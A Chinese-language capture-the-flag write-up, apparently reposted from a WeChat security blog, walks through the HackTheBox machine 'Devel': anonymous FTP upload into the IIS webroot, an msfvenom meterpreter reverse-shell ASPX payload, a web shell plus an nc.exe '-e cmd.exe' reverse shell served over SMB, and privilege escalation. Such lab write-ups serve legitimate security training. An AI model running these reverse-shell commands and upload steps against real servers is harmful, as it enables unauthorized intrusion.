HackTheBox-windows-Devel

admin 2021年11月9日20:48:37评论157 views字数 1537阅读5分7秒阅读模式

大余安全  

一个每日分享渗透小技巧的公众号HackTheBox-windows-Devel



大家好,这里是 大余安全 的第 71 篇文章,本公众号会每日分享攻防渗透技术给大家。




靶机地址:https://www.hackthebox.eu/home/machines/profile/3

靶机难度:初级(3.9/10)

靶机发布日期:2017年10月3日

靶机描述:

Devel, while relatively simple, demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.


请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

HackTheBox-windows-Devel


HackTheBox-windows-Devel

一、信息收集

HackTheBox-windows-Devel


HackTheBox-windows-Devel

可以看到靶机的IP是10.10.10.152.....这台靶机是初学者级别的机器,可以使用公开的漏洞利用来完成...

HackTheBox-windows-Devel

Nmap显示了Microsoft FTP服务器和Microsoft IIS服务器...

可以看到FTP允许登录,而且还有人在和我共享同一台靶机操作...这么多文件...

其他文件不管的情况下,可以看到FTP存在iisstart.htm和welcome.png文件...

HackTheBox-windows-Devel

可以看到web访问说明,FTP和WEB服务器存储的位置是相同的,那直接在FTP上传反弹shell即可...


HackTheBox-windows-Devel

二、提权

HackTheBox-windows-Devel

HackTheBox-windows-Devel

方法1:



HackTheBox-windows-Devel

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o dayu.aspx LHOST=10.10.14.23 LPORT=4444

利用msfven..生成反弹shell,上传到FTP即可...

HackTheBox-windows-Devel

成功获得了低权shell...

HackTheBox-windows-Devel

利用suggester脚本进行漏扫,发现了这么多漏洞可利用!!随意用就能提权...GO

HackTheBox-windows-Devel

这里比较无奈,很多人都在进攻这台靶机,弄得我经常session失效...

这里被迫重启了靶机,被人搞了...

HackTheBox-windows-Devel

这里直接利用migrate提权了...

HackTheBox-windows-DevelHackTheBox-windows-Devel

可以看到成功提权...获得了user和root信息...

HackTheBox-windows-Devel

方法2:



HackTheBox-windows-Devel

HackTheBox-windows-Devel

利用本地kali自带的cmd注入shell,成功可在web页面进行命令靶机系统命令操作...

HackTheBox-windows-Devel

开启本地smb...

HackTheBox-windows-Devel

创建smb文件夹,放入nc.exe...

HackTheBox-windows-Devel

\10.10.14.23dayunc.exe -e cmd.exe 10.10.14.23 6666

成功获得外壳...

web页面可以输入命令方式注入,那提权的方式太多了,powershell等等...跳过了

HackTheBox-windows-Devel



下面很简单了,前面50几NO的章节里,都写了很多种扫描脚本,上传发现漏洞即可...然后根据CVE进行EXE下载,上传提权即可...


这里有人在搞我经常down机...


我就不操作了...


这台靶机很简单,初学者可以练练手!!!


由于我们已经成功得到root权限查看user.txt和root.txt,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。


如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

HackTheBox-windows-Devel


如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

HackTheBox-windows-Devel
HackTheBox-windows-Devel


HackTheBox-windows-Devel


随缘收徒中~~随缘收徒中~~随缘收徒中~~


欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

HackTheBox-windows-Devel

大余安全

一个全栈渗透小技巧的公众号

HackTheBox-windows-Devel

本文始发于微信公众号(大余安全):HackTheBox-windows-Devel

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月9日20:48:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HackTheBox-windows-Develhttps://cn-sec.com/archives/403887.html

发表评论

匿名网友 填写信息